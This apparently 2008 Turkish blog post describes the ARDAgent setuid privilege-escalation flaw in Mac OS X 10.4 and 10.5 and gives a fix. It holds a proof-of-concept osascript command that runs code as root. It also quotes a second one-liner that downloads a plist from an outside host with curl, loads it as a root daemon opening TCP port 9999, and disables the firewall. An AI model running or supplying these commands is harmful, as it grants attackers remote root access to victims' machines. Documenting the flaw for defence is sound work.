Ana sayfa

Mac OS X Kritik Güvenlik Açığı

Tarih Haziran 20th, 2008 gonderen fuzbing

Mac OS X 10.4 ve 10.5 üzerinde kritik olarak nitelendirilen bir güvenlik açığı tespit edildi. Bu açık ile birlikte kurbanın bilgisayarında uzaktan ya da yerel olarak root haklarına sahip olunabiliyor. Mac OS X'te bulunan uzaktan kontrol sistemi ARDAgent'in setuid'e sahip olması yani yapılan isteğin, isteği yapan kişinin izinleriyle yapması ile güvenlik açığı aktif hale gelebiliyor.

Örnek olarak şu komut konsolda çalıştırıldığında güvenlik zaafiyeti görülmekte,

osascript -e 'tell app "ARDAgent" to do shell script "whoami"';

Slashdot'da konuyla ilgili yapılan tartışma içerisinde başka saldırı örnekleri de verilmekte.

osascript -e 'tell app "ARDAgent" to do shell script "cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist [cdslash.net] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl "'

Komutu TCP 9999 portunu açılabiliyor.

Çözüm:
System Settings/Sharing/ altında bulunan Remote Management özelliği aktif edilince güvenlik açığı sömürülemez hale geliyor. Bir başka öneri de Apple Remote Desktop'u Mac'inizden tamamen kaldırmak. Bunun için şu adresi inceleyebilirsiniz.

Referans:
http://www.intego.com/news/ism0802.asp

Telif Hakkı

Bu yazının telif hakkı, içeriğinde aksi belirtilmemişse yazarına aittir ©. Yazının izin alınmadan ya da kaynak gösterilmeden kopyalanması ve kullanılması 5846 sayılı Fikir ve Sanat Eserleri Yasasına göre suçtur (forum ve bloglar dahil olmak üzere). Telif haklarına aykırı bir durumla karşılaşırsanız lütfen site yetkililerine bildiriniz.